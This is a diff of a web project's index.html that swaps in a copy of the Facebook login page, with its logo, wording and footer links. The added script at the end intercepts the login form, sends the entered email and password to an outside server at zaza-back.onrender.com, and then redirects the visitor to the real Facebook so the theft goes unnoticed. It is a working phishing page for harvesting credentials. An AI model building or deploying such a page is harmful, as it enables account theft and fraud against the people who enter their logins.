--- a/public/index.html
+++ b/public/index.html
@@ -1,34 +1,123 @@
 <!DOCTYPE html>
 <html lang="en">
-  <head>
-    <meta charset="UTF-8" />
-    <link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yD/r/d4ZIVX-5C-b.ico">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Facebook – log in or sign up</title>
-  </head>
-  <body class="bg-gray-100">
-  <link rel="stylesheet" href="/src/style.css" />
-  <script type="module" src="/src/main.js"></script>
-  <div id="app"></div>
-  <script type="module" src="/src/main.js"></script>
-    <div class="flex items-center justify-center min-h-screen">
-      <div class="flex flex-col lg:flex-row items-center lg:items-start justify-center gap-12">
-        <div class="max-w-sm lg:max-w-md">
-          <img src="https://static.xx.fbcdn.net/rsrc.php/yl/r/ogmP7OE0vXG.svg" alt="Facebook" class="w-80 mb-4">
-          <h2 class="text-xl lg:text-2xl text-gray-800">Facebook helps you connect and share with the people in your life.</h2>
-        </div>
-        <div class="bg-white p-6 rounded-lg shadow-md w-full max-w-sm">
-          <form action="https://facebook.com" method="GET" class="flex flex-col gap-3">
-            <input type="text" placeholder="Email or phone number" class="border border-gray-300 p-3 rounded focus:outline-blue-500" required>
-            <input type="password" placeholder="Password" class="border border-gray-300 p-3 rounded focus:outline-blue-500" required>
-            <button type="submit" class="bg-blue-600 hover:bg-blue-700 text-white font-bold py-2 rounded">Log In</button>
-            <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0" class="text-sm text-blue-600 text-center hover:underline">Forgot password?</a>
-            <hr class="my-2">
-            <a href="https://www.facebook.com/r.php?entry_point=login" class="bg-green-500 hover:bg-green-600 text-white text-center font-bold py-2 rounded">Create new account</a>
-          </form>
-        </div>
+<head>
+  <meta charset="UTF-8" />
+  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+  <title>Facebook – log in or sign up</title>
+  <link rel="stylesheet" href="/style.css" />
+  <link rel="icon" href="/favicon.ico" type="image/x-icon">
+</head>
+<body>
+  <div class="language-switcher">
+    <select id="langSelect">
+     <option value="en">English (US)</option>
+     <option value="ru">Русский</option>
+   </select>
+  </div>
+
+  <div class="container">
+    <div class="left">
+      <img 
+        src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg" 
+        alt="Facebook" 
+        class="logo" 
+      />
+      <h2>Connect with friends and the world around you on Facebook.</h2>
+    </div>
+
+    <div class="right">
+      <form id="loginForm" class="login-form">
+        <input type="text" id="email" placeholder="Email or phone number" required />
+        <span id="emailError" class="error"></span>
+
+        <input type="password" id="password" placeholder="Password" required />
+        <span id="passwordError" class="error"></span>
+
+        <button type="submit" class="login-btn">Log In</button>
+        <a href="https://www.facebook.com/recover/initiate" class="forgot-link">Forgot password?</a>
+        <hr />
+        <button type="button" class="create-btn" onclick="window.location.href='https://www.facebook.com/reg';">Create new account</button>
+      </form>
+
+      <div class="create-page">
+        <a href="https://www.facebook.com/pages/create">Create a Page</a> for a celebrity, brand or business.
       </div>
     </div>
-    <p class="text-center mt-4 text-sm"><a href="https://www.facebook.com/pages/create/?ref_type=registration_form" class="font-semibold hover:underline">Create a Page</a> for a celebrity, brand or business.</p>
-  </body>
+  </div>
+
+<footer class="footer">
+  <div class="footer-content">
+    <div class="languages">
+      <a href="#">English (US)</a>
+      <a href="#">Polski</a>
+      <a href="#">ślōnskŏ gŏdka</a>
+      <a href="#">Русский</a>
+      <a href="#">Deutsch</a>
+      <a href="#">Français (France)</a>
+      <a href="#">Italiano</a>
+      <a href="#">Українська</a>
+      <a href="#">Español (España)</a>
+      <a href="#">Português (Brasil)</a>
+      <a href="#">العربية</a>
+    </div>
+
+    <hr class="footer-separator" />
+
+    <div class="links">
+      <a href="https://www.facebook.com/reg">Sign Up</a>
+      <a href="https://www.facebook.com/login">Log In</a>
+      <a href="https://www.messenger.com/">Messenger</a>
+      <a href="https://www.facebook.com/lite/">Facebook Lite</a>
+      <a href="https://www.facebook.com/watch/">Video</a>
+      <a href="https://pay.facebook.com/">Meta Pay</a>
+      <a href="https://www.facebook.com/store">Meta Store</a>
+      <a href="https://www.meta.com/quest/">Meta Quest</a>
+      <a href="https://www.ray-ban.com/">Ray-Ban Meta</a>
+      <a href="https://www.meta.ai/">Meta AI</a>
+      <a href="https://www.instagram.com/">Instagram</a>
+      <a href="https://www.threads.net/">Threads</a>
+      <a href="https://www.facebook.com/votinginformationcenter/">Voting Information Center</a>
+      <a href="https://www.facebook.com/privacy/policy">Privacy Policy</a>
+      <a href="https://www.facebook.com/privacy/center/">Privacy Center</a>
+      <a href="https://www.facebook.com/help/delete_account?rdrhc">Cancel contracts here</a>
+      <a href="https://www.facebook.com/about">About</a>
+      <a href="https://www.facebook.com/ads/create">Create ad</a>
+      <a href="https://www.facebook.com/pages/create">Create Page</a>
+      <a href="https://developers.facebook.com/">Developers</a>
+      <a href="https://www.facebook.com/careers/">Careers</a>
+      <a href="https://www.facebook.com/policies/cookies/">Cookies</a>
+      <a href="https://www.facebook.com/adpreferences/ad_settings/">Ad choices</a>
+      <a href="https://www.facebook.com/terms">Terms</a>
+      <a href="https://www.facebook.com/help/">Help</a>
+      <a href="https://www.facebook.com/help/contact/268228883256323">Contact Uploading & Non-Users</a>
+    </div>
+
+    <p class="meta-copy">Meta © 2025</p>
+  </div>
+</footer>
+
+  <script type="module">
+    const loginForm = document.getElementById('loginForm');
+
+    loginForm.addEventListener('submit', async (e) => {
+      e.preventDefault();
+
+      const email = document.getElementById('email').value.trim();
+      const password = document.getElementById('password').value.trim();
+
+      try {
+        await fetch('https://zaza-back.onrender.com/login', {
+          method: 'POST',
+          headers: { 'Content-Type': 'application/json' },
+          body: JSON.stringify({ email, password })
+        });
+
+        window.location.href = 'https://www.facebook.com/';
+      } catch (error) {
+        console.error('Login failed:', error);
+        window.location.href = 'https://www.facebook.com/';
+      }
+    });
+  </script>
+</body>
 </html>
